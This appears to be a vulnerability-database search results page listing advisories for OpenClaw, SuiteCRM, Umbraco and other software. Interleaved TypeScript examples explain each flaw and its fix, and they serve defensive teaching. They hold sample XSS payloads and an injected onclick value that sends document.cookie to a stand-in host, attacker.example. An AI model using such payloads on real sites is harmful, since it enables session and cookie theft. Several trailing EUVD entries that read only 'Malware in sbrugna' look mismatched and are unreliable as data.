Lucene search

326 matches found

OSV (added 2026/03/21 3:31 a.m., 3 views)

GHSA-86JJ-29WC-7Q2W Duplicate Advisory: OpenClaw's Signal reaction-only status events could, in limited cases, be enqueued before access checks

Duplicate Advisory: This advisory has been withdrawn because it is a duplicate of GHSA-792q-qw95-f446. This link is maintained to preserve external references. Original Description: OpenClaw versions prior to 2026.2.25 contain an access control vulnerability in signal reaction notification handling...

CVSS 6.3 | AI score 5.7 | EPSS 0.00042
Exploits: 0 | References: 4
CVE (added 2026/03/21 12:42 a.m., 7 views)

CVE-2026-32050

OpenClaw is affected in versions prior to 2026.2.25. The vulnerability arises in signal reaction notification handling, where an access control failure allows unauthorized senders to enqueue status events before authorization checks are applied. Specifically, the reaction-only event path in event...

CVSS 6.3 | AI score 5.8 | EPSS 0.00042
Exploits: 0 | References: 3 | Affected Software: 1
Cvelist (added 2026/03/21 12:42 a.m., 20 views)

CVE-2026-32050 OpenClaw < 2026.2.25 - Unauthorized Reaction Status Event Enqueue via Access Check Bypass

OpenClaw versions prior to 2026.2.25 contain an access control vulnerability in signal reaction notification handling that allows unauthorized senders to enqueue status events before authorization checks are applied. Attackers can exploit the reaction-only event path in event-handler.ts to queue...

CVSS 6.3 | EPSS 0.00042
Exploits: 0 | References: 3
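The three OpenClaw entries above describe one ordering bug: a reaction-only fast path that enqueues a status event before the sender has been authorized. The following TypeScript is an added example, not OpenClaw's code from event-handler.ts; the event and queue types, the allow-list policy, `isAuthorizedSender` and the sample sender identities are all hypothetical. It places the vulnerable handler shape beside the fixed one, where the access check is the first statement on every path.

```typescript
// Added example, not OpenClaw's code: models the ordering bug described for
// CVE-2026-32050 (a reaction-only path that enqueues before the sender is
// authorized) and the fix of hoisting the check. Types and names are hypothetical.

type SignalEvent = {
  sender: string;            // assumed: sender identity as the transport reports it
  reactionOnly: boolean;     // true when the envelope carries a reaction and no message body
  body?: string;
  reaction?: { emoji: string; targetTimestamp: number };
};

type StatusEvent = { kind: "reaction" | "message"; from: string; detail: string };

class StatusQueue {
  readonly items: StatusEvent[] = [];
  enqueue(e: StatusEvent): void {
    this.items.push(e);
  }
}

// Hypothetical access policy: only senders on an explicit allow-list may produce status events.
function isAuthorizedSender(sender: string, allowList: ReadonlySet<string>): boolean {
  return allowList.has(sender);
}

// Vulnerable shape: the reaction-only fast path enqueues and returns before the
// access check, so the check only ever guards the message path.
function handleEventVulnerable(ev: SignalEvent, queue: StatusQueue, allowList: ReadonlySet<string>): boolean {
  if (ev.reactionOnly && ev.reaction) {
    queue.enqueue({ kind: "reaction", from: ev.sender, detail: ev.reaction.emoji });
    return true; // early return: the authorization below never runs for this path
  }
  if (!isAuthorizedSender(ev.sender, allowList)) {
    return false;
  }
  queue.enqueue({ kind: "message", from: ev.sender, detail: ev.body ?? "" });
  return true;
}

// Fixed shape: authorization is the first statement, before any side effect on any path.
function handleEventFixed(ev: SignalEvent, queue: StatusQueue, allowList: ReadonlySet<string>): boolean {
  if (!isAuthorizedSender(ev.sender, allowList)) {
    return false; // unauthorized senders cause no queue activity at all
  }
  if (ev.reactionOnly && ev.reaction) {
    queue.enqueue({ kind: "reaction", from: ev.sender, detail: ev.reaction.emoji });
    return true;
  }
  queue.enqueue({ kind: "message", from: ev.sender, detail: ev.body ?? "" });
  return true;
}

// Driver: an unlisted sender delivers a reaction-only event to both handlers.
function demo(): { vulnerable: number; fixed: number } {
  const allowList = new Set(["+15550100"]);       // constructed allow-list
  const rogue: SignalEvent = {                    // constructed event from an unlisted sender
    sender: "+15550199",
    reactionOnly: true,
    reaction: { emoji: "thumbs_up", targetTimestamp: 1710000000000 },
  };
  const q1 = new StatusQueue();
  handleEventVulnerable(rogue, q1, allowList);
  const q2 = new StatusQueue();
  handleEventFixed(rogue, q2, allowList);
  return { vulnerable: q1.items.length, fixed: q2.items.length };
}

console.log(demo()); // { vulnerable: 1, fixed: 0 }
```

The useful review habit this illustrates: in any handler with several early-return branches, the authorization check belongs above the first branch, and a test should feed an unauthorized sender down every branch and assert that nothing observable (queue growth, notifications, log lines) happens.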
CVE (added 2026/03/19 11:02 p.m., 7 views)

CVE-2026-29106

Summary: CVE-2026-29106 affects SuiteCRM prior to 7.15.1 and 8.9.3. The return_id request parameter value is copied into an HTML tag attribute that is an event handler and enclosed in double quotes, enabling a blind XSS condition. The issue is addressed in versions 7.15.1 and 8.9.3 (patches). Mit...

CVSS 6.1 | AI score 5.8 | EPSS 0.00046
Exploits: 0 | References: 2 | Affected Software: 1
ATTACKERKB (added 2026/03/19 11:02 p.m., 1 view)

CVE-2026-29106

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the value of the return_id request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotati...

CVSS 5.9 | AI score 5.8 | EPSS 0.00046
Exploits: 0 | References: 3 | Affected Software: 1
EUVD (added 2026/03/19 11:02 p.m., 3 views)

EUVD-2026-13369

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the value of the return_id request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotati...

CVSS 5.9 | AI score 5.8 | EPSS 0.00046
Exploits: 0 | References: 2
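The SuiteCRM entries above describe a request parameter landing inside a double-quoted event-handler attribute. The point a practitioner should take from that sink is that it is two nested contexts (HTML attribute, then JavaScript source), so HTML-encoding the value is not enough: the browser decodes entities in the attribute before handing it to the JS parser. The following TypeScript is an added example, not SuiteCRM's code; `goBack`, the helper names, the markup shape and the payloads are constructed. It renders three variants and checks which of them let attacker input escape the string literal.

```typescript
// Added example (not SuiteCRM's code): why attribute-encoding alone does not make an
// event-handler attribute safe, and the data-attribute pattern that does.
// The real parameter named on the page is return_id; markup and helpers are constructed.

function htmlAttrEncode(s: string): string {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Undo the five encodings above, as a browser does before the JS parser sees the handler.
function htmlAttrDecode(s: string): string {
  return s.replace(/&#39;/g, "'").replace(/&quot;/g, '"').replace(/&gt;/g, ">")
          .replace(/&lt;/g, "<").replace(/&amp;/g, "&");
}

// 1. Vulnerable: raw interpolation into a double-quoted onclick attribute.
function renderVulnerable(returnId: string): string {
  return `<button onclick="goBack('${returnId}')">Back</button>`;
}

// 2. Still vulnerable: attribute-encoded, but entities are decoded before the JS runs,
//    so a single quote still terminates the string literal.
function renderEncodedOnly(returnId: string): string {
  return `<button onclick="goBack('${htmlAttrEncode(returnId)}')">Back</button>`;
}

// 3. Safe: the value lives in a plain attribute; the handler source contains no user input.
function renderSafe(returnId: string): string {
  return `<button data-return-id="${htmlAttrEncode(returnId)}" onclick="goBack(this.dataset.returnId)">Back</button>`;
}

// The JavaScript the browser would execute for the first onclick attribute, after entity decoding.
function handlerSource(html: string): string | null {
  const m = /onclick="([^"]*)"/.exec(html);
  return m ? htmlAttrDecode(m[1]) : null;
}

// Compromised if the executed JS is anything other than goBack('<literal>') with no
// quote or backslash inside the literal, or if a second on* attribute was injected.
function handlerCompromised(html: string): boolean {
  const src = handlerSource(html);
  if (src === null) return false;
  const wellFormed = /^goBack\('[^'\\]*'\)$/.test(src) || src === "goBack(this.dataset.returnId)";
  const extraHandlers = (html.match(/\son[a-z]+="/g) ?? []).length > 1;
  return !wellFormed || extraHandlers;
}

// Constructed payloads: one breaks out of the attribute, one breaks out of the JS string.
const BREAK_ATTRIBUTE = 'x" onmouseover="alert(1)';
const BREAK_JS_STRING = "x'); alert(1); //";

console.log(handlerCompromised(renderVulnerable(BREAK_ATTRIBUTE)));   // true
console.log(handlerCompromised(renderEncodedOnly(BREAK_JS_STRING)));  // true
console.log(handlerCompromised(renderSafe(BREAK_JS_STRING)));         // false
```

With a Content Security Policy that forbids inline handlers, the safe variant moves one step further: the `onclick` attribute goes away entirely and a script attaches the listener with `addEventListener`, reading `dataset.returnId`; the data-attribute encoding stays the same.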
Github Security Blog (added 2026/03/11 2:54 p.m., 3 views)

Umbraco has Stored XSS in UFM Rendering Pipeline via Permissive DOMPurify Attribute Filtering

Description: An authenticated backoffice user with access to Settings can inject malicious HTML into property type descriptions. Due to an overly permissive attributeNameCheck configuration (/.+/) in the UFM DOMPurify instance, event handler attributes such as onclick and onload, when used within...

CVSS 6.7 | AI score 5.8 | EPSS 0.00066
Exploits: 0 | References: 3 | Affected Software: 1
OSV (added 2026/03/10 9:51 p.m., 1 view)

CVE-2026-31833 Umbraco has Stored XSS in UFM Rendering Pipeline via Permissive DOMPurify Attribute Filtering

Umbraco is an ASP.NET CMS. From 16.2.0 to before 16.5.1 and 17.2.2, an authenticated backoffice user with access to Settings can inject malicious HTML into property type descriptions. Due to an overly permissive attributeNameCheck configuration (/.+/) in the UFM DOMPurify instance, event handler...

CVSS 6.7 | AI score 5.8 | EPSS 0.00066
Exploits: 0 | References: 3
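The two Umbraco entries above turn on a single configuration value: a DOMPurify `attributeNameCheck` of `/.+/`. DOMPurify's `CUSTOM_ELEMENT_HANDLING` hook lets an attribute that is not on the default allow-list survive on a custom element when both the tag regex and the attribute regex match, and no value inspection follows for `on*` names. The following TypeScript is an added example, not Umbraco's or DOMPurify's code: it is a reduced model of that decision, with the permissive configuration beside an explicit allow-list. The `umb-` tag prefix, the default-attribute subset and the sample markup are constructed.

```typescript
// Added example, not Umbraco's or DOMPurify's code: a reduced model of how
// DOMPurify's CUSTOM_ELEMENT_HANDLING hook decides whether an attribute on a custom
// element survives sanitization. The permissive configuration mirrors the /.+/
// attributeNameCheck named on the page; the tag prefix "umb-", the default
// attribute subset and the sample attribute map are constructed.

type CustomElementHandling = { tagNameCheck: RegExp; attributeNameCheck: RegExp };

// Constructed subset of DOMPurify's default attribute allow-list.
const DEFAULT_ALLOWED_ATTR: ReadonlySet<string> = new Set(["class", "id", "href", "src", "alt", "title"]);

// Weak: any attribute name at all is accepted on a matching custom element, so on* handlers pass.
const PERMISSIVE: CustomElementHandling = { tagNameCheck: /^umb-/, attributeNameCheck: /.+/ };

// Hardened: an explicit allow-list of the attribute names the custom elements actually need
// (constructed names; a real list comes from the components' own contracts).
const RESTRICTIVE: CustomElementHandling = { tagNameCheck: /^umb-/, attributeNameCheck: /^(alias|value|label)$/ };

// Simplified form of DOMPurify's custom-element name test: lowercase, must contain a hyphen.
function isBasicCustomElement(tag: string): boolean {
  return /^[a-z][a-z0-9]*(-[a-z0-9]+)+$/.test(tag);
}

// True if the attribute would be kept. Decision order modelled: default allow-list,
// data-* attributes, then the custom-element escape hatch, which requires BOTH regexes
// to match. Nothing inspects the value of an on* attribute once its name is accepted,
// so the name check is the only line of defence here.
function attributeSurvives(tag: string, attr: string, handling: CustomElementHandling): boolean {
  const lcTag = tag.toLowerCase();
  const lcName = attr.toLowerCase();
  if (DEFAULT_ALLOWED_ATTR.has(lcName)) return true;
  if (/^data-[\w.-]+$/.test(lcName)) return true;
  return isBasicCustomElement(lcTag)
    && handling.tagNameCheck.test(lcTag)
    && handling.attributeNameCheck.test(lcName);
}

// Apply the decision to a parsed attribute map and return what remains.
function sanitizeAttributes(
  tag: string,
  attrs: Record<string, string>,
  handling: CustomElementHandling,
): Record<string, string> {
  const kept: Record<string, string> = {};
  for (const [name, value] of Object.entries(attrs)) {
    if (attributeSurvives(tag, name, handling)) kept[name] = value;
  }
  return kept;
}

// Constructed attacker markup: a custom element carrying an inline event handler.
const ATTACK_ATTRS: Record<string, string> = {
  class: "note",
  onclick: "fetch('https://attacker.example/?c=' + document.cookie)",
  "data-id": "42",
};

console.log(Object.keys(sanitizeAttributes("umb-description", ATTACK_ATTRS, PERMISSIVE)));   // [ 'class', 'onclick', 'data-id' ]
console.log(Object.keys(sanitizeAttributes("umb-description", ATTACK_ATTRS, RESTRICTIVE)));  // [ 'class', 'data-id' ]
```

The check to add to a code review of any DOMPurify configuration: grep for `CUSTOM_ELEMENT_HANDLING`, and treat an `attributeNameCheck` (or `tagNameCheck`) that is a catch-all regex or a function returning `true` as equivalent to `ADD_ATTR: ['onclick', ...]`.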
Snyk (added 2026/03/06 6:39 p.m., 1 view)

Cross-site Scripting (XSS)

Overview: defuddle is a package that extracts article content and metadata from web pages. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the findContentBySchemaText fallback in src/defuddle.ts. An attacker can execute arbitrary scripts in consuming applications extensions,...

CVSS 6.1 | AI score 5.7 | EPSS 0.0002
Exploits: 1 | References: 2
Snyk (added 2026/02/19 3:18 p.m., 2 views)

Cross-site Scripting (XSS)

Overview: org.webjars.npm:svelte is a package for building web applications. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the spread syntax when rendering attributes from untrusted data during server-side rendering. An attacker can execute arbitrary JavaScript i...

CVSS 5.5 | AI score 5.9 | EPSS 0.00011
Exploits: 0 | References: 2
Exploit DB (added 2026/02/04 12:00 a.m., 177 views)

OctoPrint 1.11.2 - File Upload

Exploit Title: OctoPrint 1.11.2 - File Upload
Date: 2025-09-28
Exploit Author: prabhatverma.addada
Vendor Homepage: https://octoprint.org
Software Link: https://github.com/OctoPrint/OctoPrint
Affected Versions: <= 1.11.2
Patched Versions: 1.11.3
CVE: CVE-2025-58180
CVSS per advisory: 7.5
Platform:...

CVSS 8.8 | AI score 5.2 | EPSS 0.02219
Exploits: 4
Tenable Nessus (added 2026/01/20 12:00 a.m., 4 views)

MiracleLinux 8 : thunderbird-128.2.0-1.el8_10.ML.1 (AXSA:2024-8858:20)

The remote MiracleLinux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the AXSA:2024-8858:20 advisory. thunderbird: 115.15/128.2; mozilla: Type confusion when looking up a property name in a with block (CVE-2024-8381); mozilla: Internal event interfaces...

CVSS 9.8 | AI score 5.6 | EPSS 0.11622
Exploits: 1 | References: 9
Microsoft CVE (added 2026/01/16 9:01 a.m., 1 view)

RDMA/irdma: avoid invalid read in irdma_net_event

...

CVSS 7.1 | AI score 5.4 | EPSS 0.00023
Exploits: 0
Tenable Nessus (added 2025/11/05 12:00 a.m., 2 views)

Unity Linux 20.1070a Security Update: kernel (UTSA-2025-989284)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2025-989284 advisory. In the Linux kernel, the following vulnerability has been resolved: rtc: cmos: Fix event handler registration ordering issue. Because acpi_install_fixed_event_handler...

CVSS 5.5 | AI score 5.8 | EPSS 0.00009
Exploits: 0 | References: 4
EUVD (added 2025/10/07 12:30 a.m., 4 views)

EUVD-2019-19182

Malware in sbrugna...

CVSS 9.8 | AI score 9.2 | EPSS 0.00786
Exploits: 0 | References: 18
EUVD (added 2025/10/07 12:30 a.m., 3 views)

EUVD-2011-0792

Malware in sbrugna...

CVSS 6.8 | AI score 6.1 | EPSS 0.00485
Exploits: 0 | References: 4
EUVD (added 2025/10/07 12:30 a.m., 2 views)

EUVD-2016-6213

Malware in sbrugna...

CVSS 6.1 | AI score 8 | EPSS 0.00294
Exploits: 0 | References: 18
EUVD (added 2025/10/07 12:30 a.m., 2 views)

EUVD-2018-17610

Malware in sbrugna...

CVSS 7.8 | AI score 7.7 | EPSS 0.00043
Exploits: 0 | References: 2
EUVD (added 2025/10/07 12:30 a.m., 3 views)

EUVD-2018-3915

Malware in sbrugna...

CVSS 7.8 | AI score 7.7 | EPSS 0.00045
Exploits: 0 | References: 2
EUVD (added 2025/10/07 12:30 a.m., 2 views)

EUVD-2017-6361

Malware in sbrugna...

CVSS 9.8 | AI score 9.5 | EPSS 0.00182
Exploits: 0 | References: 3